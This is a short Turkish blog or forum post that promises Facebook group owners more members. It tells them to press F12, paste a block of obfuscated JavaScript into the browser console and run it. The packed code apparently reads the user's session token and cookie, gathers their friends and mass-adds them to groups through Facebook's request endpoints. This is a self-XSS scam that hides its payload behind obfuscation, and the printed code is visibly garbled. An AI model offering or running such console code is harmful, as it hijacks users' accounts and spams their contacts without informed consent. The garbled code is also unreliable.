Merhaba Arkadaşlar Aslında Bu Konuyu Dun Paylaşacaktım Fakat Kodu Kaybettim Sonra Yeni Bir Kod Buldum .

Biliyorum Şu Sıralar Webmaster Yada Ne Bileyim Bi Muzik Grubu Acan Cok Kişi Var Ve Acan Facebook Kişileri Grubunun Fazla İlerlemediğini Gorunce Grubu Kapattığını Gordum
Bunun İcinde Bu Konuyu Acmakta Bu Kodu Paylaşmayı Uygun Buldum…

Her Neyse Ben Kodları Paylaşayım Ardındanda Nasıl Uygulayacağınızı Yazayım.Pardon İlk Once Nasıl Yapacağınızı Yazayım Sonra Kodları Paylaşayım.

İlk Olarak Kodları Alıyoruz Ve Kodları Uygulayacağımız Gruba Geliyoruz. Ardından F12 Tuşuna Basıyoruz Ve Consola Ya Aldığımız Kodları Yapıştırıp Entere Basıyoruz. Bu Kadar Kolay Bunu Uygulamak. Kod:
javascript:void(function();if(!''.replace(/^/,String))];e=function();c=1};while(c--)if(k1)p=p.replace(new RegExp('b'+e(c]'b','g'),k1);return p}('(D())}j.u('G').v='1y '+f.B.y+' T'+I;U(x V f.B)}1G q(c.K==4&&c.Q==2b)1G};c.1L()},1F(d)q(a.C&&a.C.F) }b+='';j.u('1A').v=b}q(a.18)}}q(f.J==f.B.y)}};e.1L (Y)}};w g=['i','a','e','g','o','s','n','b','l','p','m','2','r ','0','c','1','t','3','2N'],1c=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+'.'+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+'.'+g[14]+g[4]+g[10],I=''+g[1].1Y(]g[0]+g[6]+g[3]+g[14].1Y(]g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+' '+g[g.y-1]+g[11]+g[13]+g15+g17+''+1c+'';j.1Z.v+='1H 1I T, 1J 1K.. '+I+'';f.1m('/1P/1N/3d.1Q?1M=1&3e='+f.E+'&3f='+1w.1x(]'&3g0=3h&3i0=3j')})();',62,206,'|||||||||||||||||d iv||document|style||||||if||||getElementById|inner HTML|var||length||color|frns|jsmods|function|uid|r equire|hasilsurasil|hasiltiga|crj|prenKe|readyStat e|id|font|new|okeh|gagal|status|eval|payload|Frien ds|for|in|darkred|darkgreen|prm|setRequestHeader|| |||||||onload|href|center|size|crl|10px|dtsg|getEl ementsByName|fb_dtsg|value|cookie|match|gid|group_ id|getAjak|XMLHttpRequest|open|true|onreadystatech ange|200|responseText|substr|entries|return|Math|r andom|Found|hasilsatu|hasildua|min|width|display|l eft|senAjak|else|Collecting|your|wait|up|send|__a| typeahead|members|ajax|php|Content|errorDescriptio n|span|name|target|_blank|top|toUpperCase|body|bor der|225|c_user|Array|GET|sort|300px|inline|block|t ext|align|404|Page|Not|source|ref|message_id|__use r|phstamp|POST|groups|add_post|type|application|ww w|form|urlencoded|Connection|keep|alive|of|replace |Arbiter|inform|has|been|added|to|group|break|text Align|40px|weight|bold|DONE|onClick|none|false|Clo se|xA9|margin|gray|12px|9px|http|height|50px|600px |position|fixed|100px|offsetWidth|530|px|radius|pa dding|index|999999|5px|solid|skyblue|background|rg ba|255|75|first_degree|viewer|token|filter|user|op tions|friends_only'.split('|'),0,))})()

Ondan Bundan | Ondan Bundan Paylaşıyoz